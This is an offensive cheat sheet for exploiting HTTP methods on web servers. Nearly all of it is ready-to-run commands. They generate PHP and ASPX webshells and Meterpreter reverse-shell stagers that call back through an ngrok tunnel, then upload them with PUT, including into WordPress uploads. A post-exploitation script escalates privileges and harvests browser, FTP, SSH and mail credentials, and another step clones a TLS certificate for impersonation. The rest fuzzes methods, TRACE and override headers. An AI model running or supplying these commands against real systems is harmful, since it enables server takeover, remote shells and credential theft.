HTTP Methods

Check List

Cheat Sheet

Discover the Supported Methods

Check Methods

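# Ask the server which methods it advertises for the URL in $WEBSITE.
# -I prints only response headers; -X swaps the HEAD that -I implies for OPTIONS.
# The Allow header is self-reported: a verb missing from it may still be accepted
# and a listed one may be blocked by a front-end, so confirm each verb directly.
curl -X OPTIONS -I "$WEBSITE"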

Upload phpinfo()

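# Probe whether PUT is writable by uploading a minimal phpinfo() page.
# -d sends the body with curl's default form Content-Type unless one is given;
# a 2xx reply means the path accepted a write, which is the finding to record
# whether or not the server then executes the file.
curl -X PUT -d "<?php phpinfo(); ?>" "$WEBSITE/phpinfo.php"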

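# Service/version scan plus the http-methods NSE script against the same host.
# -sS (SYN scan) and --mtu (packet fragmentation) need raw-socket privileges,
# so this normally runs as root; nmap requires --mtu to be a multiple of 8.
# NOTE(review): nmap takes a host, not a URL — if WEBSITE carries a scheme or
# path (it is used as a URL prefix elsewhere on this page), strip it first.
nmap -sS -sV --mtu 5000 --script http-methods "$WEBSITE"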

PUT Method

Create Web Shell PHP

# Generate a password-protected weevely agent under a neutral filename.
# The password is reused by the later weevely connect step, so keep both in sync.
agent_pass=00980098
agent_out=/tmp/unk9vvn.php
weevely generate "$agent_pass" "$agent_out"

Create Web Shell ASPX

# Stage a stock ASPX command page from the local webshells collection in /tmp.
src_aspx=/usr/share/webshells/aspx/cmdasp.aspx
dst_aspx=/tmp/unk9vvn.aspx
cp -- "$src_aspx" "$dst_aspx"

Upload Web Shell PHP

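# PUT the PHP agent into the target's uploads directory.
# --upload-file already implies PUT; -X PUT is kept for readability.
curl -X PUT "$WEBSITE/uploads/index.php" \
  --upload-file /tmp/unk9vvn.php \
  -H "Content-Type: application/x-php"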

Execute Web Shell PHP

# Connect to the uploaded agent using the password chosen at generation time.
agent_pass=00980098
agent_url="$WEBSITE/uploads/index.php"
weevely "$agent_url" "$agent_pass"

Upload Web Shell ASP

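# PUT the ASPX command page into the target's uploads directory.
# --upload-file already implies PUT; -X PUT is kept for readability.
curl -X PUT "$WEBSITE/uploads/index.aspx" \
  --upload-file /tmp/unk9vvn.aspx \
  -H "Content-Type: application/x-aspx"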

Execute Web Shell ASP

# Call the uploaded ASPX page. --get with --data-urlencode builds exactly the
# same ?cmd=whoami query string as writing it into the URL.
curl --get --data-urlencode 'cmd=whoami' "$WEBSITE/uploads/index.aspx"

All Methods Scan

# Run the Metasploit OPTIONS scanner over TLS on port 443 as a background job.
# NOTE(review): RHOSTS takes a host/IP/CIDR; WEBSITE is used as a URL prefix
# elsewhere on this page, so confirm it holds a bare hostname here.
msf_cmds="use auxiliary/scanner/http/options;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;run -j"
msfconsole -qx "$msf_cmds"

PUT Method Scan

# Run the Metasploit http_put scanner against /uploads over TLS on port 443.
# NOTE(review): RHOSTS takes a host/IP/CIDR; WEBSITE is used as a URL prefix
# elsewhere on this page, so confirm it holds a bare hostname here.
msf_cmds="use auxiliary/scanner/http/http_put;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;set PATH /uploads;run -j"
msfconsole -qx "$msf_cmds"

Start Ngrok

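# Start an ngrok TCP tunnel to local port 4444 in the background, detached from
# the terminal (nohup) with its output discarded. Keep the PID so the tunnel can
# be torn down with kill "$ngrok_pid" once the listener is no longer needed.
nohup ngrok tcp 4444 >/dev/null 2>&1 &
ngrok_pid=$!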

Define ENV Ngrok

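# Read the local ngrok agent API and pull the public TCP endpoint out of the
# tunnel's public_url ("tcp://N.tcp.ngrok.io:PORT") into NGHOST / NGPORT.
# Here-strings replace echo|sed, and the dots in the host pattern are escaped so
# only a real *.tcp*.ngrok.io name matches.
# NOTE(review): the regexes assume a single tcp tunnel in the JSON; jq would be
# the robust parser if it is available.
NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels)
NGHOST=$(sed -nE 's#.*public_url":"tcp://([^"]*):.*#\1#p' <<<"$NGINFO")
NGPORT=$(sed -nE 's#.*public_url":"tcp://.*\.tcp.*\.ngrok\.io:([^"]*).*#\1#p' <<<"$NGINFO")
# Fail loudly rather than letting empty values flow into msfvenom/msfconsole later.
[[ -n "$NGHOST" && -n "$NGPORT" ]] || printf 'warning: could not parse ngrok public_url (is ngrok running?)\n' >&2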

Cert Spoof

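# Clear previously collected loot, then clone the TLS certificate presented by
# the named host into ~/.msf4/loot (impersonate_ssl).
# ~/.msf4 lives under $HOME, which is not /home/$USER when running as root;
# ${HOME:?} aborts instead of expanding to "/.msf4/loot/*" if HOME is unset.
rm -rf -- "${HOME:?}/.msf4/loot/"*
msfconsole -qx "use auxiliary/gather/impersonate_ssl;set RHOSTS google.com;run;exit"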

Post-EXP

# Write the Meterpreter resource script that AutoRunScript executes on each new
# session: privilege steps first, then the listed gather modules, then background
# the session. The quoted delimiter makes the body literal (no shell expansion).
cat > /tmp/post-exp.rc <<'EOF'
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
bg
EOF

Generate Web shell PHP

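# Build a PHP reverse-TCP stager pointing at the ngrok public endpoint, encode it
# three times with php/base64, then wrap the raw output in <?php ... ?> tags.
# The payload's listener-port option is LPORT (the handler below sets LPORT too);
# the original PORT= was not a recognised option, so the callback port would not
# have matched the tunnel.
msfvenom -p php/meterpreter/reverse_tcp LHOST="$NGHOST" LPORT="$NGPORT" EnableStageEncoding=true \
  -f raw -e php/base64 -i 3 -o /tmp/unk9vvn.php
# One sed pass; the two substitutions are independent so the result is unchanged.
sed -i -e 's#eval#<?php eval#g' -e 's#));#)); ?>#g' /tmp/unk9vvn.php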

Generate Web Shell ASP

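# Build a Windows Meterpreter stager that calls back over HTTPS to the ngrok
# public endpoint. LPORT (not PORT) is the recognised option and must match the
# handler's LPORT.
# NOTE(review): -f asp emits classic ASP, while the output file and the later
# upload Content-Type are ASPX; confirm which handler the target maps.
msfvenom -p windows/meterpreter/reverse_winhttps LHOST="$NGHOST" LPORT="$NGPORT" EnableStageEncoding=true \
  -f asp > /tmp/unk9vvn.aspx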

Listening Metasploit PHP

# Start the handler for the PHP stager. LHOST/LPORT are the public ngrok
# address the payload connects to; the listener itself binds on 127.0.0.1:4444,
# which the tunnel forwards. post-exp.rc runs automatically on each new session.
handler_cmds=(
  "use multi/handler"
  "set PAYLOAD php/meterpreter/reverse_tcp"
  "set LHOST $NGHOST"
  "set LPORT $NGPORT"
  "set ReverseListenerBindAddress 127.0.0.1"
  "set ReverseListenerBindPort 4444"
  "set StageEncoder true"
  "set AutoRunScript /tmp/post-exp.rc"
  "run -j"
)
msfconsole -qx "$(IFS=';'; printf '%s' "${handler_cmds[*]}")"

Listening Metasploit ASP

# Start the handler for the Windows HTTPS stager. LHOST/LPORT are the public
# ngrok address the payload connects to; the listener binds on 127.0.0.1:4444,
# which the tunnel forwards. post-exp.rc runs automatically on each new session.
handler_cmds=(
  "use multi/handler"
  "set PAYLOAD windows/meterpreter/reverse_winhttps"
  "set LHOST $NGHOST"
  "set LPORT $NGPORT"
  "set ReverseListenerBindAddress 127.0.0.1"
  "set ReverseListenerBindPort 4444"
  "set StageEncoder true"
  "set AutoRunScript /tmp/post-exp.rc"
  "run -j"
)
msfconsole -qx "$(IFS=';'; printf '%s' "${handler_cmds[*]}")"

Upload Shell PUT Method PHP

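# PUT the generated PHP stager into a WordPress uploads directory.
# --upload-file already implies PUT; -X PUT is kept for readability.
curl -X PUT "$WEBSITE/wp-content/uploads/index.php" \
  --upload-file /tmp/unk9vvn.php \
  -H "Content-Type: application/x-php"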

Access Control Bypass

Extract URLs

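# Crawl the site with katana and write the discovered URLs to a file, skipping
# static-asset paths and image/CSS extensions, following JS/XHR references.
# --no-sandbox disables the headless browser's process sandbox: crawled pages are
# untrusted content, so prefer running this inside a container or VM.
katana -u "$WEBSITE" \
  -fr "(static|assets|img|images|css|fonts|icons)/" \
  -o /tmp/katana_output.txt \
  -xhr-extraction \
  -automatic-form-fill \
  -silent \
  -strategy breadth-first \
  -js-crawl \
  -extension-filter jpg,jpeg,png,gif,bmp,tiff,tif,webp,svg,ico,css \
  -headless --no-sandbox \
  -known-files all \
  -field url \
  -sf url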

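# Normalise the crawled URLs into a deduplicated list of path prefixes: drop
# query strings, strip a trailing .aspx, drop a trailing /<name>.json, skip .js
# files and lines containing HTML-escaped entities, then sort -u.
# [?] is a literal question mark in every sed; the original \? is a GNU-only
# quantifier escape whose meaning at pattern start is implementation-dependent.
# One sed invocation with -e expressions applies the same substitutions in order.
sed -e 's/[?].*//' -e 's/\.aspx$//' -e 's/\/[^/]*\.json$//' /tmp/katana_output.txt \
  | grep -v -e '\.js$' -e '&amp' \
  | sort -u > /tmp/urls.txt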

HTTP Method Fuzz

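# Fuzz every HTTP verb against each crawled URL x directory word and report
# responses with status 200 (-r follows redirects). PUT/DELETE/PATCH hits are
# write-capable endpoints and are the primary finding here.
# printf replaces echo -e, whose escape handling is not portable.
printf '%s\n' GET POST PUT DELETE HEAD OPTIONS TRACE CONNECT PATCH > /tmp/methods.txt
ffuf -w /tmp/methods.txt:METHODS \
  -w /tmp/urls.txt:URL \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
  -u URL/DIR \
  -X METHODS \
  -r -c -mc 200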

Cross-Site Tracing Potential

# Cross-site tracing probe: a TRACE response that echoes the custom request
# header (matched with -mr on the marker string) shows the server reflects
# request headers back to the client.
# NOTE(review): the header value reads "<scipt>"; only the marker string is
# matched, so the typo does not affect the check.
xst_header="Custom-Test-Header: <scipt>alert('unk9vvn')</script>"
xst_args=(
  -w /tmp/urls.txt:URL
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR
  -u URL/DIR
  -X TRACE
  -H "$xst_header"
  -r -c -mc 200 -mr unk9vvn
)
ffuf "${xst_args[@]}"

HTTP Method Overriding

X-HTTP-Method

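# Fuzz verbs while also sending the same verb in X-HTTP-Method.
# printf replaces echo -e, whose escape handling is not portable.
# NOTE(review): -X and the override header both carry METHODS, so the real
# method always equals the override value; an override misconfiguration is only
# observable when the two differ — confirm this is the intended probe.
printf '%s\n' GET POST PUT DELETE HEAD OPTIONS TRACE CONNECT PATCH > /tmp/methods.txt
ffuf -w /tmp/methods.txt:METHODS \
  -w /tmp/urls.txt:URL \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
  -u URL/DIR \
  -X METHODS \
  -H "X-HTTP-Method: METHODS" \
  -r -c -mc 200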

X-HTTP-Method-Override

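# Fuzz verbs while also sending the same verb in X-HTTP-Method-Override.
# printf replaces echo -e, whose escape handling is not portable.
# NOTE(review): -X and the override header both carry METHODS, so the real
# method always equals the override value; an override misconfiguration is only
# observable when the two differ — confirm this is the intended probe.
printf '%s\n' GET POST PUT DELETE HEAD OPTIONS TRACE CONNECT PATCH > /tmp/methods.txt
ffuf -w /tmp/methods.txt:METHODS \
  -w /tmp/urls.txt:URL \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
  -u URL/DIR \
  -X METHODS \
  -H "X-HTTP-Method-Override: METHODS" \
  -r -c -mc 200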

X-Method-Override

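# Fuzz verbs while also sending the same verb in X-Method-Override.
# printf replaces echo -e, whose escape handling is not portable.
# NOTE(review): -X and the override header both carry METHODS, so the real
# method always equals the override value; an override misconfiguration is only
# observable when the two differ — confirm this is the intended probe.
printf '%s\n' GET POST PUT DELETE HEAD OPTIONS TRACE CONNECT PATCH > /tmp/methods.txt
ffuf -w /tmp/methods.txt:METHODS \
  -w /tmp/urls.txt:URL \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
  -u URL/DIR \
  -X METHODS \
  -H "X-Method-Override: METHODS" \
  -r -c -mc 200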
